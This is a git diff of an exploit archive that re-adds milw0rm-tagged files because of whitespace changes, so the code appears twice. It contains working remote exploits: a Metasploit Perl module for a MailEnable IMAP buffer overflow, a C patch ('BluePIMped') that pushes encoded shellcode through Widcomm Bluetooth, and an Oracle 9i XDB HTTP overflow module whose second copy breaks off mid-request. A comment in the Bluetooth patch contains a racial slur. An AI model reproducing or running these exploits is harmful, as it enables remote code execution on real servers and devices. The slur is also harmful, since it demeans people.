-}), - 'Refs' => - [ - ['BID', 15006], - ], - 'Targets' => - [ - ['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL - ], - 'Keys' => ['imap'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - - return($self); -} - -sub Check { - my ($self) = @_; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => 25, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $s->Send("QUIT\r\n"); - my $res = $s->Recv(-1, 20); - $s->Close(); - - if ($res !~ /MailEnable Service, Version: 0-1\.54/) { - $self->PrintLine("[*] This server does not appear to be vulnerable."); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Vulnerable installation detected :-)"); - return $self->CheckCode('Detected'); -} - -sub Exploit { - my $self = shift; - - my $targetHost = $self->GetVar('RHOST'); - my $targetPort = $self->GetVar('RPORT'); - my $targetIndex = $self->GetVar('TARGET'); - my $user = $self->GetVar('USER'); - my $pass = $self->GetVar('PASS'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $shellcode = $encodedPayload->Payload; - my $target = $self->Targets->[$targetIndex]; - - my $sock = Msf::Socket::Tcp->new( - 'PeerAddr' => $targetHost, - 'PeerPort' => $targetPort, - ); - if($sock->IsError) { - $self->PrintLine('Error creating socket: ' . $sock->GetError); - return; - } - - my $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got Banner: ' . $resp); - - my $sploit = "a01 LOGIN $user $pass\r\n"; - $sock->Send($sploit); - my $resp = $sock->Recv(-1); - if($sock->IsError) { - $self->PrintLine('Socket error: ' . 
$sock->GetError); - return; - } - if($resp !~ /^a01 BAD LOGIN-/) { - $self->PrintLine('Login error: ' . $resp); - return; - } - $self->PrintLine('[*] Logged in, sending overflow'); - - my $splat = Pex::Text::AlphaNumText(6196); - $sploit = - "a01 SELECT ". $splat. - "\xeb\x06". pack('V', $target->[1]). - $shellcode. "\r\n"; - - $sock->Send($sploit); - - my $resp = $sock->Recv(-1); - if(length($resp)) { - $self->PrintLine('[*] Got response, bad: ' . $resp); - } - - return; - -} - -1; - -# milw0rm.com [2005-11-20] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::mailenable_imap_w3c; +use strict; +use base 'Msf::Exploit'; +use Msf::Socket::Tcp; +use Pex::Text; + +my $advanced = { + }; + +my $info = { + 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', + 'Version' => '$Revision: 1.1 $', + 'Authors' => [ 'y0 ', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], + 'Priv' => 1, + 'AutoOpts' => + { + 'EXITFUNC' => 'thread', + }, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 143], + 'USER' => [1, 'DATA', 'IMAP Username'], + 'PASS' => [1, 'DATA', 'IMAP Password'], + + }, + 'Payload' => + { + 'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff", + 'Space' => 600, + 'BadChars' => "\x00\x0a\x0d\x20", + 'Keys' => ['+ws2ord'], + }, + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a buffer overflow in the W3C logging + functionality of the MailEnable IMAPD service. Logging is not + enabled by default and this exploit requires a valid username + and password to exploit the flaw. 
MailEnable Professional version + 1.6 and prior and MailEnable Enterprise version 1.1 and prior are + affected. +}), + 'Refs' => + [ + ['BID', 15006], + ], + 'Targets' => + [ + ['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL + ], + 'Keys' => ['imap'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + + return($self); +} + +sub Check { + my ($self) = @_; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => 25, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return $self->CheckCode('Connect'); + } + + $s->Send("QUIT\r\n"); + my $res = $s->Recv(-1, 20); + $s->Close(); + + if ($res !~ /MailEnable Service, Version: 0-1\.54/) { + $self->PrintLine("[*] This server does not appear to be vulnerable."); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Vulnerable installation detected :-)"); + return $self->CheckCode('Detected'); +} + +sub Exploit { + my $self = shift; + + my $targetHost = $self->GetVar('RHOST'); + my $targetPort = $self->GetVar('RPORT'); + my $targetIndex = $self->GetVar('TARGET'); + my $user = $self->GetVar('USER'); + my $pass = $self->GetVar('PASS'); + my $encodedPayload = $self->GetVar('EncodedPayload'); + my $shellcode = $encodedPayload->Payload; + my $target = $self->Targets->[$targetIndex]; + + my $sock = Msf::Socket::Tcp->new( + 'PeerAddr' => $targetHost, + 'PeerPort' => $targetPort, + ); + if($sock->IsError) { + $self->PrintLine('Error creating socket: ' . $sock->GetError); + return; + } + + my $resp = $sock->Recv(-1); + chomp($resp); + $self->PrintLine('[*] Got Banner: ' . 
$resp); + + my $sploit = "a01 LOGIN $user $pass\r\n"; + $sock->Send($sploit); + my $resp = $sock->Recv(-1); + if($sock->IsError) { + $self->PrintLine('Socket error: ' . $sock->GetError); + return; + } + if($resp !~ /^a01 BAD LOGIN-/) { + $self->PrintLine('Login error: ' . $resp); + return; + } + $self->PrintLine('[*] Logged in, sending overflow'); + + my $splat = Pex::Text::AlphaNumText(6196); + $sploit = + "a01 SELECT ". $splat. + "\xeb\x06". pack('V', $target->[1]). + $shellcode. "\r\n"; + + $sock->Send($sploit); + + my $resp = $sock->Recv(-1); + if(length($resp)) { + $self->PrintLine('[*] Got response, bad: ' . $resp); + } + + return; + +} + +1; + +# milw0rm.com [2005-11-20] diff --git a/platforms/windows/remote/135.c b/platforms/windows/remote/135.c index d6a527e18..ea95f8e67 100755 --- a/platforms/windows/remote/135.c +++ b/platforms/windows/remote/135.c @@ -216,6 +216,6 @@ int main(int argc,char *argv[]) } return 0; } - - -// milw0rm.com [2003-12-16] + + +// milw0rm.com [2003-12-16] diff --git a/platforms/windows/remote/1357.diff b/platforms/windows/remote/1357.diff index ba8f5d984..242a0ec57 100755 --- a/platforms/windows/remote/1357.diff +++ b/platforms/windows/remote/1357.diff 
@@ -1,171 +1,171 @@ ---- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400 -+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500 -@@ -1,4 +1,10 @@ - /* -+ http://www.digitalmunition.com -+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. -+ http://www.pentest.co.uk/documents/ptl-2004-03.html -+ -+*/ -+/* - * UNrooted.net example code - * - * Most of these functions are just rips from the Affix Bluetooth project OBEX -@@ -62,7 +68,10 @@ - - #include "obex_socket.h" - --#define UPUSH_APPNAME "ussp-push v0.4" -+#include -+#include -+ -+#define UPUSH_APPNAME "BluePIMped v0.1" - #define BT_SERVICE "OBEX" - #define OBEX_PUSH 5 - -@@ -316,6 +325,9 @@ - switch (event) { - case OBEX_EV_PROGRESS: - printf("Made some progress...\n"); -+ sleep(3); -+ printf("Peace nigga...\n"); -+ exit(0); - break; - - case OBEX_EV_ABORT: -@@ -382,9 +394,7 @@ - name = remote; - - name_len = (strlen(name)+1)<<1; -- if( (namebuf = g_malloc(name_len)) ) { -- OBEX_CharToUnicode(namebuf, name, name_len); -- } -+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. - - buf = easy_readfile(path, &file_size); - if(buf == NULL) { -@@ -424,6 +434,24 @@ - return err; - } - -+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual... -+{ -+ int s = hci_open_dev(hdev); -+ -+ if (s < 0) { -+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n", -+ hdev, strerror(errno), errno); -+ exit(1); -+ } -+ if (opt) { -+ if (hci_write_local_name(s, opt, 2000) < 0) { -+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n", -+ hdev, strerror(errno), errno); -+ exit(1); -+ } -+ } -+ -+} - - /* - * That's all there is to it. 
With it all setup like this all I have to do -@@ -434,19 +462,87 @@ - - int main( int argc, char **argv ) - { -- if ( argc != 4 ) { -- printf("%s\n\n" -- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n" -- "\tDEVICE = RFCOMM TTY device file\n" -- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n" -- "\tLFILE = Local file path\n" -- "\tRFILE = Remote file name\n\n", -- UPUSH_APPNAME, argv[0]); -+/* -+ The following may be necessary in hcid.conf to prevent the pairing prompts. -+ -+ # Authentication and Encryption (Security Mode 3) -+ auth disable; -+ encrypt disable; -+*/ -+ -+ struct -+ { -+ char *os; -+ u_long ret; -+ } -+ targets[] = -+ { -+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e }, -+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e }, -+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e }, -+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e }, -+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e }, -+ { "[ Crash ]", 0x41424344 }, -+ }, v; -+ -+ if ( argc != 3 ) { -+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]); -+ printf("Types:\n"); -+ int i; -+ for(i = 0; i < sizeof(targets)/sizeof(v); i++) -+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os); -+ - return( -1 ); - } - -- printf( "pushing file %s\n", argv[2] ); -- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) { -+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */ -+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */ -+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ -+ /* this still crashes the BTStackServer.exe... 
but oh well */ -+ unsigned char scode[] = -+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7" -+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f" -+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03" -+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16" -+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7" -+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4" -+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04" -+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54" -+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f" -+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5" -+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c" -+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73" -+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03" -+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a"; -+ -+ set_device_name(0,0,scode); -+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode); -+ //printf( "pushing file.\n"); -+ -+ char buf[3000]; -+ memset(buf,'\0',sizeof(buf)); -+ memset(buf,'Z',3); // Sometimes u need 3 z's -+ -+ int type = atoi(argv[2]); -+ if(type) -+ { -+ printf("[-] Selected target:\n"); -+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os); -+ } -+ -+ int x; -+ for(x=0; x<=122; x=x+1) -+ { -+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4); -+ } -+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode -+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) { -+ printf( "error\n" ); -+ return( -1 ); -+ } -+ printf("\nsleeping 3 seconds before triggering the shellcode\n"); -+ sleep(3); -+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) { - printf( "error\n" ); - return( -1 ); - } - -// milw0rm.com [2005-12-04] +--- 
ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400 ++++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500 +@@ -1,4 +1,10 @@ + /* ++ http://www.digitalmunition.com ++ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. ++ http://www.pentest.co.uk/documents/ptl-2004-03.html ++ ++*/ ++/* + * UNrooted.net example code + * + * Most of these functions are just rips from the Affix Bluetooth project OBEX +@@ -62,7 +68,10 @@ + + #include "obex_socket.h" + +-#define UPUSH_APPNAME "ussp-push v0.4" ++#include ++#include ++ ++#define UPUSH_APPNAME "BluePIMped v0.1" + #define BT_SERVICE "OBEX" + #define OBEX_PUSH 5 + +@@ -316,6 +325,9 @@ + switch (event) { + case OBEX_EV_PROGRESS: + printf("Made some progress...\n"); ++ sleep(3); ++ printf("Peace nigga...\n"); ++ exit(0); + break; + + case OBEX_EV_ABORT: +@@ -382,9 +394,7 @@ + name = remote; + + name_len = (strlen(name)+1)<<1; +- if( (namebuf = g_malloc(name_len)) ) { +- OBEX_CharToUnicode(namebuf, name, name_len); +- } ++ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. + + buf = easy_readfile(path, &file_size); + if(buf == NULL) { +@@ -424,6 +434,24 @@ + return err; + } + ++static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual... ++{ ++ int s = hci_open_dev(hdev); ++ ++ if (s < 0) { ++ fprintf(stderr, "Can't open device hci%d: %s (%d)\n", ++ hdev, strerror(errno), errno); ++ exit(1); ++ } ++ if (opt) { ++ if (hci_write_local_name(s, opt, 2000) < 0) { ++ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n", ++ hdev, strerror(errno), errno); ++ exit(1); ++ } ++ } ++ ++} + + /* + * That's all there is to it. 
With it all setup like this all I have to do +@@ -434,19 +462,87 @@ + + int main( int argc, char **argv ) + { +- if ( argc != 4 ) { +- printf("%s\n\n" +- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n" +- "\tDEVICE = RFCOMM TTY device file\n" +- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n" +- "\tLFILE = Local file path\n" +- "\tRFILE = Remote file name\n\n", +- UPUSH_APPNAME, argv[0]); ++/* ++ The following may be necessary in hcid.conf to prevent the pairing prompts. ++ ++ # Authentication and Encryption (Security Mode 3) ++ auth disable; ++ encrypt disable; ++*/ ++ ++ struct ++ { ++ char *os; ++ u_long ret; ++ } ++ targets[] = ++ { ++ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e }, ++ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e }, ++ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e }, ++ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e }, ++ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e }, ++ { "[ Crash ]", 0x41424344 }, ++ }, v; ++ ++ if ( argc != 3 ) { ++ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]); ++ printf("Types:\n"); ++ int i; ++ for(i = 0; i < sizeof(targets)/sizeof(v); i++) ++ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os); ++ + return( -1 ); + } + +- printf( "pushing file %s\n", argv[2] ); +- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) { ++ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */ ++ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */ ++ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ ++ /* this still crashes the BTStackServer.exe... 
but oh well */ ++ unsigned char scode[] = ++ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7" ++ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f" ++ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03" ++ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16" ++ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7" ++ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4" ++ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04" ++ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54" ++ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f" ++ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5" ++ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c" ++ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73" ++ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03" ++ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a"; ++ ++ set_device_name(0,0,scode); ++ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode); ++ //printf( "pushing file.\n"); ++ ++ char buf[3000]; ++ memset(buf,'\0',sizeof(buf)); ++ memset(buf,'Z',3); // Sometimes u need 3 z's ++ ++ int type = atoi(argv[2]); ++ if(type) ++ { ++ printf("[-] Selected target:\n"); ++ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os); ++ } ++ ++ int x; ++ for(x=0; x<=122; x=x+1) ++ { ++ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4); ++ } ++ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode ++ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) { ++ printf( "error\n" ); ++ return( -1 ); ++ } ++ printf("\nsleeping 3 seconds before triggering the shellcode\n"); ++ sleep(3); ++ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) { + printf( "error\n" ); + return( -1 ); + } + +// milw0rm.com [2005-12-04] 
diff --git a/platforms/windows/remote/136.pl b/platforms/windows/remote/136.pl index b5e0d366a..2dd61b10d 100755 --- a/platforms/windows/remote/136.pl +++ b/platforms/windows/remote/136.pl @@ -84,6 +84,6 @@ $request = "GET /SwEzModule.dll?operation=login&autologin=". print "Done\r\n"; exit; - - -# milw0rm.com [2003-12-18] + + +# milw0rm.com [2003-12-18] diff --git a/platforms/windows/remote/1365.pm b/platforms/windows/remote/1365.pm index e03399a54..3102c6df2 100755 --- a/platforms/windows/remote/1365.pm +++ b/platforms/windows/remote/1365.pm 
@@ -1,164 +1,163 @@ - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::oracle9i_xdb_http; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - - 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', - 'Version' => '$Revision: 1.1 $', - 'Authors' => [ 'y0 [at] w00t-shell.net', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 8080], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'AutoOpts' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { - 'Space' => 450, - 'BadChars' => "\x00", - 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", - 'Keys' => ['+ws2ord'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a stack overflow in the authorization - code of the Oracle 9i HTTP XDB service. David Litchfield, - has illustrated multiple vulnerabilities in the Oracle - 9i XML Database (XDB), during a seminar on "Variations - in exploit methods between Linux and Windows" presented - at the Blackhat conference. 
-}), - - 'Refs' => [ - ['BID', '8375'], - ['CVE', '2003-0727'], - ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'] - ], - - 'DefaultTarget' => 0, - 'Targets' => [ - - ['Oracle 9.2.0.1 Universal', 0x60616d46], - - ], - - 'Keys' => ['oracle'], - - 'DisclosureDate' => 'Aug 18 2003', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my ($self) = @_; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $s->Send("GET / HTTP/1.0\r\n\r\n"); - my $res = $s->Recv(-1, 20); - $s->Close(); - - if ($res !~ /9\.2\.0\.1\.0/) { - $self->PrintLine("[*] This server does not appear to be vulnerable."); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Vulnerable installation detected :-)"); - return $self->CheckCode('Detected'); -} - -sub Exploit -{ - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $offset = $self->GetVar('OFFSET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - if (! $self->InitNops(128)) { - $self->PrintLine("[*] Failed to initialize the nop module."); - return; - } - - my $splat = - "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42". - pack('V', $target->[1]). "wwwwoooottttsssshhhhllll". - $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode; - - my $sploit = - "GET / HTTP/1.1". "\r\n". - "Host: $target_host:$target_port". "\r\n". - "User-Agent: Mozilla/5.0 (X11; U; Linux i686;". 
- "en-US; rv:1.7.12) Gecko/20050923". "\r\n". - "Accept: text/xml,application/xml,application". - "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,". - "image/png,*/*;q=0.5". "\r\n". - "Accept-Language: en-us,en;q=0.5". "\r\n". - "Accept-Encoding: gzip,deflate". "\r\n". - "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n". - "Keep-Alive: 300". "\r\n". - "Connection: keep-alive". "\r\n". - "Authorization: Basic ". Pex::Text::Base64Encode($splat, ''). - "\r\n\r\n"; - - $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $s->Send($sploit); - $self->Handler($s); - $s->Close(); - return; -} - -1; - - -# milw0rm.com [2005-12-08] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. 
+## + +package Msf::Exploit::oracle9i_xdb_http; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + + 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', + 'Version' => '$Revision: 1.1 $', + 'Authors' => [ 'y0 [at] w00t-shell.net', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 8080], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'AutoOpts' => { 'EXITFUNC' => 'thread' }, + 'Payload' => + { + 'Space' => 450, + 'BadChars' => "\x00", + 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", + 'Keys' => ['+ws2ord'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a stack overflow in the authorization + code of the Oracle 9i HTTP XDB service. David Litchfield, + has illustrated multiple vulnerabilities in the Oracle + 9i XML Database (XDB), during a seminar on "Variations + in exploit methods between Linux and Windows" presented + at the Blackhat conference. +}), + + 'Refs' => [ + ['BID', '8375'], + ['CVE', '2003-0727'], + ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'] + ], + + 'DefaultTarget' => 0, + 'Targets' => [ + + ['Oracle 9.2.0.1 Universal', 0x60616d46], + + ], + + 'Keys' => ['oracle'], + + 'DisclosureDate' => 'Aug 18 2003', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my ($self) = @_; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return $self->CheckCode('Connect'); + } + + $s->Send("GET / HTTP/1.0\r\n\r\n"); + my $res = $s->Recv(-1, 20); + $s->Close(); + + if ($res !~ /9\.2\.0\.1\.0/) { + $self->PrintLine("[*] This server does not appear to be vulnerable."); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Vulnerable installation detected :-)"); + return $self->CheckCode('Detected'); +} + +sub Exploit +{ + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $offset = $self->GetVar('OFFSET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + + if (! $self->InitNops(128)) { + $self->PrintLine("[*] Failed to initialize the nop module."); + return; + } + + my $splat = + "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42". + pack('V', $target->[1]). "wwwwoooottttsssshhhhllll". + $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode; + + my $sploit = + "GET / HTTP/1.1". "\r\n". + "Host: $target_host:$target_port". "\r\n". + "User-Agent: Mozilla/5.0 (X11; U; Linux i686;". + "en-US; rv:1.7.12) Gecko/20050923". "\r\n". + "Accept: text/xml,application/xml,application". + "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,". + "image/png,*/*;q=0.5". "\r\n". + "Accept-Language: 